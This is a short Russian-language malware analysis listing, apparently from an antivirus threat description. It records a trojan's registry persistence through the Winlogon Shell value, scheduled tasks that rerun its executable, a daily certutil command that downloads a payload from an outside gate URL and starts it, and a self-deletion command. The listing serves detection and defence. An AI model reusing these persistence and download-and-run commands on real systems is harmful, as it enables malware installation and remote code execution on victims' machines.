Техническая информация
- [<HKCU>\Software\Microsoft\Windows NT\CurrentVersion\Winlogon] 'Shell' = 'C:\ProgramData\{8SEFXTBJ-I8UT-XHRH-L2V0S37F8XIP}\8221720876.exe'
- '<SYSTEM32>\taskkill.exe' /im <Имя файла>.exe /f
- <Полный путь к файлу>
- ClassName: '' WindowName: ''
- '<SYSTEM32>\schtasks.exe' /Create /SC MINUTE /MO 15 /TN "WCBBZAHPVZVCK844VD" /TR "C:\ProgramData\{8SEFXTBJ-I8UT-XHRH-L2V0S37F8XIP}\8221720876.exe" /F
- '<SYSTEM32>\schtasks.exe' /Create /SC DAILY /MO 1 /TN "P2E1USENZCQ32ZYUJC" /TR "cmd.exe /c certutil -urlcache -split -f http://kd#.fi/gate/update.php C:\ProgramData\update.exe & start C:\ProgramData\update.exe " /F
- '<SYSTEM32>\cmd.exe' /c taskkill /im <Имя файла>.exe /f & erase <Полный путь к файлу> & exit